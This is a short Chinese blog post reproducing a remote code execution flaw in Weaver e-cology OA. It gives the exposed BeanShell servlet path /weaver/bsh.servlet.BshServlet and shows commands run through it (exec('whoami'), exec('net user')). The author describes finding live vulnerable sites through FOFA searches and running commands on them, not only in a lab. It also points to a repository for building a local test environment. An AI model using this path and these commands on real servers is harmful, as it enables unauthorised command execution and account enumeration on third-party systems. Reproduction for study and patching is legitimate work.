泛微e-cology OA 远程代码执行漏洞复现
复现过程:
直接使用FOFA搜索语法搜索,找了好久才找到含有漏洞的站点。
在根目录后面输入漏洞路径: /weaver/bsh.servlet.BshServlet
进入BeanShell操作页面

在Script中输入语句,结果会在Script Output中输出。
输入exec("whoami") 结果如图,可知这个系统是windows系统,查看/etc/passwd就不用想了

使用exec("net user")查看本机用户。

如果想本地搭建环境复现可见https://github.com/jas502n/e-cology

浙公网安备 33010602011771号